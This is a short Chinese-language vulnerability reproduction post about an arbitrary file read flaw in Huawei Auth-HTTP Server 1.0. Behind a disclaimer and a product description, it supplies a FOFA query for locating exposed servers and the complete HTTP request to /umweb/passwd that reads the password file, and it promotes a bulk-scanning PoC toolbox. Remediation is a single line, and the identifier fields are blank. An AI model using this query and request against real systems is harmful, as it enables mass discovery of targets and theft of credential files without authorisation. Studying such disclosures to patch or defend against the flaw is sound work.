Huawei Auth-HTTP Server 1.0 存在任意文件读取漏洞 附POC

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. Huawei Auth-HTTP Server 1.0 简介

微信公众号搜索：南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

Huawei Auth-HTTP Server 1.0 是华为公司提供的一种身份验证及授权解决方案。它是一个基于HTTP协议的身份认证服务器，旨在为企业网络和系统提供安全的访问控制服务。

2.漏洞描述

Huawei Auth-HTTP Server 1.0 可以实现基于角色的访问控制，通过用户的身份认证和权限控制，确保只有经过授权的用户可以访问特定的资源和服务。它支持常见的身份认证协议和技术，如LDAP、RADIUS、TACACS+等，能够与企业现有的认证系统无缝集成，提供一致的认证体验。

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

Huawei Auth-HTTP Server 1.0

4.fofa查询语句

server="Huawei Auth-Http Server 1.0"

5.漏洞复现

漏洞链接：https://127.0.0.1/umweb/passwd

漏洞数据包：

GET /umweb/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Connection: Keep-Alive
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Upgrade-Insecure-Requests: 1

6.POC&EXP

本期漏洞及往期漏洞的批量扫描POC及POC工具箱已经上传知识星球：南风网络安全

7.整改意见

请联系厂商升级补丁

8.往期回顾